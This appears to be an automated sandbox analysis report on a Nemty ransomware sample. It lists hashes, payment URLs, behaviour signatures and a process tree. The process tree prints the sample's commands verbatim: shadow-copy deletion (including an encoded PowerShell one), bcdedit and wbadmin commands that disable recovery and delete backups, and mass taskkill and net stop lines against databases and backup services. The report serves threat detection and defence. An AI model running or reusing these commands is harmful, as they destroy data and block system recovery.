Analysis
-
max time kernel
62s -
max time network
98s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
01-02-2022 07:18
Static task
static1
Behavioral task
behavioral1
Sample
4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe
Resource
win10v2004-en-20220113
General
-
Target
4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe
-
Size
87KB
-
MD5
c96613c857018555f3a5bc227567e6e7
-
SHA1
a402f5e46c8e056c9e9494f7e83902e0fcae3a61
-
SHA256
4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3
-
SHA512
086fa536e03882efe6eb79a6f56d954205e00c37885f5d23f8eae47702125d7fed2a8c76d6d2e01d6eeb175f273185844a6494847bef2f0f805560867f075c41
Malware Config
Extracted
C:\NEMTY_WJ29D2J-DECRYPT.txt
nemty
http://nemty.top/public/pay.php
http://zjoxyw5mkacojk5ptn2iprkivg5clow72mjkyk5ttubzxprjjnwapkad.onion/public/pay.php
Signatures
-
Nemty
Ransomware discovered in late 2019 which has been actively developed/updated over time.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 17 api.ipify.org 19 api.db-ip.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 7 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 4716 taskkill.exe 3660 taskkill.exe 216 taskkill.exe 2780 taskkill.exe 4236 taskkill.exe 1432 taskkill.exe 4284 taskkill.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exepid process 3088 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe 3088 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe -
Suspicious use of AdjustPrivilegeToken 48 IoCs
Processes:
WMIC.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exedescription pid process Token: SeIncreaseQuotaPrivilege 2076 WMIC.exe Token: SeSecurityPrivilege 2076 WMIC.exe Token: SeTakeOwnershipPrivilege 2076 WMIC.exe Token: SeLoadDriverPrivilege 2076 WMIC.exe Token: SeSystemProfilePrivilege 2076 WMIC.exe Token: SeSystemtimePrivilege 2076 WMIC.exe Token: SeProfSingleProcessPrivilege 2076 WMIC.exe Token: SeIncBasePriorityPrivilege 2076 WMIC.exe Token: SeCreatePagefilePrivilege 2076 WMIC.exe Token: SeBackupPrivilege 2076 WMIC.exe Token: SeRestorePrivilege 2076 WMIC.exe Token: SeShutdownPrivilege 2076 WMIC.exe Token: SeDebugPrivilege 2076 WMIC.exe Token: SeSystemEnvironmentPrivilege 2076 WMIC.exe Token: SeRemoteShutdownPrivilege 2076 WMIC.exe Token: SeUndockPrivilege 2076 WMIC.exe Token: SeManageVolumePrivilege 2076 WMIC.exe Token: 33 2076 WMIC.exe Token: 34 2076 WMIC.exe Token: 35 2076 WMIC.exe Token: 36 2076 WMIC.exe Token: SeDebugPrivilege 4284 taskkill.exe Token: SeDebugPrivilege 4716 taskkill.exe Token: SeDebugPrivilege 3660 taskkill.exe Token: SeIncreaseQuotaPrivilege 2076 WMIC.exe Token: SeSecurityPrivilege 2076 WMIC.exe Token: SeTakeOwnershipPrivilege 2076 WMIC.exe Token: SeLoadDriverPrivilege 2076 WMIC.exe Token: SeSystemProfilePrivilege 2076 WMIC.exe Token: SeSystemtimePrivilege 2076 WMIC.exe Token: SeProfSingleProcessPrivilege 2076 WMIC.exe Token: SeIncBasePriorityPrivilege 2076 WMIC.exe Token: SeCreatePagefilePrivilege 2076 WMIC.exe Token: SeBackupPrivilege 2076 WMIC.exe Token: SeRestorePrivilege 2076 WMIC.exe Token: SeShutdownPrivilege 2076 WMIC.exe Token: SeDebugPrivilege 2076 WMIC.exe Token: SeSystemEnvironmentPrivilege 2076 WMIC.exe Token: SeRemoteShutdownPrivilege 2076 WMIC.exe Token: SeUndockPrivilege 2076 WMIC.exe Token: SeManageVolumePrivilege 2076 WMIC.exe Token: 33 2076 WMIC.exe Token: 34 2076 WMIC.exe Token: 35 2076 WMIC.exe Token: 36 2076 WMIC.exe Token: SeDebugPrivilege 216 taskkill.exe Token: SeDebugPrivilege 2780 taskkill.exe Token: SeDebugPrivilege 4236 taskkill.exe -
Suspicious use of WriteProcessMemory 48 IoCs
Processes:
4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.execmd.execmd.exenet.execmd.exedescription pid process target process PID 3088 wrote to memory of 1128 3088 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe cmd.exe PID 3088 wrote to memory of 1128 3088 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe cmd.exe PID 3088 wrote to memory of 1128 3088 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe cmd.exe PID 3088 wrote to memory of 1444 3088 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe cmd.exe PID 3088 wrote to memory of 1444 3088 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe cmd.exe PID 3088 wrote to memory of 1444 3088 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe cmd.exe PID 3088 wrote to memory of 4508 3088 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe cmd.exe PID 3088 wrote to memory of 4508 3088 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe cmd.exe PID 3088 wrote to memory of 4508 3088 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe cmd.exe PID 3088 wrote to memory of 4100 3088 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe cmd.exe PID 3088 wrote to memory of 4100 3088 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe cmd.exe PID 3088 wrote to memory of 4100 3088 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe cmd.exe PID 3088 wrote to memory of 2416 3088 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe cmd.exe PID 3088 wrote to memory of 2416 3088 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe cmd.exe PID 3088 wrote to memory of 2416 3088 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe cmd.exe PID 4508 wrote to memory of 4284 4508 cmd.exe taskkill.exe PID 4508 wrote to memory of 4284 4508 cmd.exe taskkill.exe PID 4508 wrote to memory of 4284 4508 cmd.exe taskkill.exe PID 4100 wrote to memory of 3772 4100 cmd.exe net.exe PID 4100 wrote to memory of 3772 4100 cmd.exe net.exe PID 4100 wrote to memory of 3772 4100 cmd.exe net.exe PID 3772 wrote to memory of 4352 3772 net.exe net1.exe PID 3772 wrote to memory of 4352 3772 net.exe net1.exe PID 3772 wrote to memory of 4352 3772 net.exe net1.exe PID 2416 wrote to memory of 2076 2416 cmd.exe WMIC.exe PID 2416 wrote to memory of 2076 2416 cmd.exe WMIC.exe PID 2416 wrote to memory of 2076 2416 cmd.exe WMIC.exe PID 3088 wrote to memory of 4448 3088 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe powershell.exe PID 3088 wrote to memory of 4448 3088 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe powershell.exe PID 3088 wrote to memory of 4448 3088 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe powershell.exe PID 4508 wrote to memory of 4716 4508 cmd.exe taskkill.exe PID 4508 wrote to memory of 4716 4508 cmd.exe taskkill.exe PID 4508 wrote to memory of 4716 4508 cmd.exe taskkill.exe PID 4508 wrote to memory of 3660 4508 cmd.exe taskkill.exe PID 4508 wrote to memory of 3660 4508 cmd.exe taskkill.exe PID 4508 wrote to memory of 3660 4508 cmd.exe taskkill.exe PID 4508 wrote to memory of 216 4508 cmd.exe taskkill.exe PID 4508 wrote to memory of 216 4508 cmd.exe taskkill.exe PID 4508 wrote to memory of 216 4508 cmd.exe taskkill.exe PID 4508 wrote to memory of 2780 4508 cmd.exe taskkill.exe PID 4508 wrote to memory of 2780 4508 cmd.exe taskkill.exe PID 4508 wrote to memory of 2780 4508 cmd.exe taskkill.exe PID 4508 wrote to memory of 4236 4508 cmd.exe taskkill.exe PID 4508 wrote to memory of 4236 4508 cmd.exe taskkill.exe PID 4508 wrote to memory of 4236 4508 cmd.exe taskkill.exe PID 4508 wrote to memory of 1432 4508 cmd.exe taskkill.exe PID 4508 wrote to memory of 1432 4508 cmd.exe taskkill.exe PID 4508 wrote to memory of 1432 4508 cmd.exe taskkill.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe"C:\Users\Admin\AppData\Local\Temp\4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe"1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im sql.* & taskkill /f /im winword.* & taskkill /f /im wordpad.* & taskkill /f /im outlook.* & taskkill /f /im thunderbird.* & taskkill /f /im oracle.* & taskkill /f /im excel.* & taskkill /f /im onenote.* & taskkill /f /im virtualboxvm.* & taskkill /f /im node.* & taskkill /f /im QBW32.* & taskkill /f /im WBGX.* & taskkill /f /im Teams.* & taskkill /f /im Flow.*2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sql.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im winword.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wordpad.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im outlook.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im thunderbird.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im oracle.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im excel.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop DbxSvc & net stop OracleXETNSListener & net stop OracleServiceXE & net stop AcrSch2Svc & net stop AcronisAgent & net stop Apache2.4 & net stop SQLWriter & net stop MSSQL$SQLEXPRESS & net stop MSSQLServerADHelper100 & net stop MongoDB & net stop SQLAgent$SQLEXPRESS & net stop SQLBrowser & net stop CobianBackup11 & net stop cbVSCService11 & net stop QBCFMontorService & net stop QBVSS2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop DbxSvc3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DbxSvc4⤵
-
C:\Windows\SysWOW64\net.exenet stop OracleXETNSListener3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OracleXETNSListener4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wmic shadowcopy delete2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵